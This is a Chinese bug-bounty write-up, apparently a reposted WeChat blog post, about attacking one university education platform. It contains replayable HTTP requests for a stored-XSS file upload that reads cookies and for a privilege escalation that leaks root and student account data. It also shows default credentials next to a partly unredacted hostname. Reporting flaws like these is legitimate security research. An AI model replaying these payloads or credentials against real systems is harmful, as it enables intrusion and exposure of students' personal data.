记一次edu单个站点斩获7rank

admin
admin
admin
139164
文章
114
评论
2023年10月20日10:16:17评论18 views字数 2181阅读7分16秒阅读模式

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关
       文章敏感部分厚码,还请兄弟们见谅!
http://xxxxxx/login

记一次edu单个站点斩获7rank

通过直接访问这个路径直接跳入后台
http://xxxxxxxxxxxxx/guidance/464

记一次edu单个站点斩获7rank

http://xxxxx/dialog/content/editor?type=new
这个这个接口能文件上传

记一次edu单个站点斩获7rank

这丢个xss
http://xxxxxxxx/dialog/content/editor?type=new

记一次edu单个站点斩获7rank

在这个上传头上中上传一个数据包,上传一个xss代码

POST /api/static/upload/experiment/file?experimentId=9 HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0Accept: application/json, text/plain,/Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data;boundary=---------------------------38011060979487556742390084841
Content-Length: 254Connection: close
-----------------------------38011060979487556742390084841Content-Disposition: form-data; name="file";filename="9.html"Content-Type: image/png<script>alert(document.cookie)</script>-----------------------------38011060979487556742390084841--

访问个网站

记一次edu单个站点斩获7rank

http://xxxxxxxxxx/api/static/resources/data/huel-fm/home/20230805091624-9.html
记一次edu单个站点斩获7rank
在这里查看东西的时候,意外发现了两个账户,也是通杀账户

记一次edu单个站点斩获7rank

数据还可以

记一次edu单个站点斩获7rank

当然拥有了,高权限账户和低权限账户,就开始尝试越权
http://huel-fm.digquant.com/login
teacher/123456

记一次edu单个站点斩获7rank

这里有全校的学生账户信息,

记一次edu单个站点斩获7rank

抓这个数据包

POST /api/user/admin/get/list HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/117.0Accept: application/json, text/plain,/Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json
Content-Length: 117Connection: close
{"experimentId":9,"pageIndex":2,"showItem":10,"collegeName":"","majorName":"","className":"","grade":"","userRole":1}
然后切换账户
student/123456

记一次edu单个站点斩获7rank

抓一个包

POST /api/experiment/report/self/newest/info HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/117.0Accept: application/json, text/plain,/Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 2
Connection: close

{}

记一次edu单个站点斩获7rank

替换接口/api/user/admin/get/list

记一次edu单个站点斩获7rank

不仅仅是垂直越权成功,还泄露了root账户,其次teacher权限账户,并没有root账户泄露。

就这一站,未授权访问2+xss 1+账户2+越权2分一共拿了七分

记一次edu单个站点斩获7rank

技术交流可加下方wx

记一次edu单个站点斩获7rank

原文始发于微信公众号(湘安无事):记一次edu单个站点斩获7rank

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月20日10:16:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次edu单个站点斩获7rankhttps://cn-sec.com/archives/2129695.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息